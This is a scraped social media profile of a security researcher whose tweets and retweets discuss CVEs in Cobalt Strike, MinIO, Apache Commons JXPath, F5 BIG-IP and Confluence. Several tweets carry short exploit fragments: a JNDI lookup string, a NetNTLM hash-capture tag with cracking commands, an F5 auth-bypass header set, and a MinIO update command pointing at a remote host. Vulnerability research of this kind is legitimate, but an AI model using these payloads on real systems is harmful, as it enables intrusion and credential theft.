jas502n Profile Banner
Jas502n Profile
Jas502n

@jas502n

Followers
8K
Following
567
Media
311
Statuses
721

${jndi:dns://${hostName}.github.com/jas502n} Become Who You Are

Central Region, Singapore
Joined July 2016
Don't wanna be here? Send us removal request.
@jas502n
Jas502n
3 years
#CVE-2022-39197 Cobalt Strike RCE =< 4.7. use codeql to search exploit chain from the database compiled by openjdk and cobaltstrike4.5 db. org.apache.batik.swing.JSVGCanvas#setURI.org.apache.batik.bridge.BaseScriptingEnvironment#loadScript
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
40
95
@jas502n
Jas502n
2 years
RT @joehowwolf: New blog post: Cobalt Strike and YARA - Can I have your signature?
0
59
0
@jas502n
Jas502n
2 years
RT @freefirex2: Converting PPLFault (original: has been one of the more difficult BOF converts, but was still pret….
0
37
0
@jas502n
Jas502n
2 years
RT @luck_hacking: Cobatstrike4.8更新了,优化了一些基本后渗透的功能,也没什么能大改的了,除非换个logo.
Tweet card summary image
cobaltstrike.com
Cobalt Strike 4.8 is live, with support for direct and indirect system calls, options to specify payload guardrails, a token store and more.
0
2
0
@jas502n
Jas502n
2 years
#RCE for #CVE-2023-28434 MinIO unauthorized to . CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w " -trimpath. mc admin update node1 http://x:80/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y.
Tweet media one
1
10
26
@jas502n
Jas502n
2 years
#CVE-2023-28432 minio Information Disclosure in Cluster Deployment
Tweet media one
Tweet media two
0
1
23
@jas502n
Jas502n
2 years
RT @Horizon3Attack: Our technical deep-dive blog post for the recent #VMware vRealize Log Insight RCE vulnerability chain leading to root p….
0
84
0
@jas502n
Jas502n
2 years
RT @onekey_rl: Let's explore how we turned a path traversal affecting binwalk into arbitrary code execution -
0
15
0
@jas502n
Jas502n
3 years
RT @pmnh_: New blog post on a recent collab with @UsmanMansha420 where I bypassed Akamai WAF to get RCE on a Java application with Spring E….
pmnh.site
Writeup of a collaborated bug on Bugcrowd where I was able to bypass Akamai WAF to exploit RCE on Spring Boot error page using SpEL
0
141
0
@jas502n
Jas502n
3 years
#CVE-2022-41828 amazon-redshift-jdbc-driver <=2.1.0.7 RCE
Tweet media one
Tweet media two
2
40
103
@jas502n
Jas502n
3 years
#CVE-2022-41852 Apache Commons JXPath RCE. context.getValue("start('calc'))"). <dependency>. <groupId>commons-beanutils</groupId>. <artifactId>commons-beanutils</artifactId>.</dependency>
Tweet media one
1
33
72
@jas502n
Jas502n
3 years
#CVE-2022-39197 Cobalt Strike . <html>< img src='file://x.x.x.x/netntlm2'%>.python3 -I eth0.john --format=netntlmv2 --wordlist=pass.txt creds.txt
Tweet media one
Tweet media two
Tweet media three
7
135
349
@jas502n
Jas502n
3 years
#CVE-2022-26134 Atlassian Confluence RCE . boolean authenticate(String username, String password)
Tweet media one
1
46
145
@jas502n
Jas502n
3 years
Tweet media one
Tweet media two
0
0
12
@jas502n
Jas502n
3 years
#CVE-2022-1388 F5's BIG-IP Unauth RCE. Connection: keep-alive, X-F5-Auth-Token.Authorization: Basic YWRtaW46.X-F5-Auth-Token: anything. https://x.x.x.x:443/mgmt/tm/util/bash
Tweet media one
6
223
568
@jas502n
Jas502n
3 years
RT @ptswarm: 🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP. Successful exploitation could lead to RCE from an unauthenticate….
0
260
0
@jas502n
Jas502n
3 years
Cobalt Strike 4.5 origin download(cobaltstrike.jar) (December 14, 2021). a5e980aac32d9c7af1d2326008537c66d55d7d9ccf777eb732b2a31f4f7ee523 . VT download:.
2
3
11